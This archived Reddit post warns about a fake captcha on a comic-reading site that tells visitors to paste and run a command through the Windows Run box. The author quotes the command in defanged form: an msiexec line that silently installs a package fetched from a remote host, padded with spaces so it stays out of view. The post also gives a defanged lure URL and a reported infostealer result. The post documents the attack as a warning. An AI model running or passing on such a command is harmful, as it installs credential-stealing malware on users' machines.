The original post: /r/piracy by /u/404_GravitasNotFound on 2024-11-22 23:39:24.
Visited the site to easily read comics, (it's easily googleable, the top level domain is li ...
This is a normally reputable site to read comics (mainly western).
It has had captchas for a long time when you started reading something.
However this time, when I opened "Watchmen, Doomsday Clock" I received a small "I'm not a robot" checkmark, upon pressing it gave a small floating window, requesting me to do the following steps:
1.- Press "Win + R"
2.- Press "Ctrl + V"
3.- Press Enter.
Step 1 would've open the "Run command" box, Step 2 would've pasted something, and Step 3. Would've run whatever I posted.
Of course I didn't proceed, after a minute or so, a page loaded that spoke of a document or something.
The page it loaded after that odd malicious captcha was:
https : //bffr1oai [.] monactinal [.] makeup/post/wJYpFHGkvqAzrglrqqOXJf
Which I'm not going to open.
The command it tried to get me to run was:
msiexec /fv https [:] //memorizable [.] yachts/31u7dkr6dcgdh /q
I'm of course editing both urls, by adding a space and brackets around the dot and colon,
The spaces after msiexec /fv were part of the original clipboard data.
It would not affect the running of the command, but it would obfuscate what you are running since the space in the "Run command" Window is limited.
msiexec for those that don't know is the windows installer...
Edit:
u/Erroredv1 mentions:
I looked Into these before and the times I executed the run command the result was always an infostealer
Troy hunt (the creator of HIBP) received a phishing email of this fake captcha verification
I ran it for him in a controlled environment and the result was an infostealer
I'll edit with any update...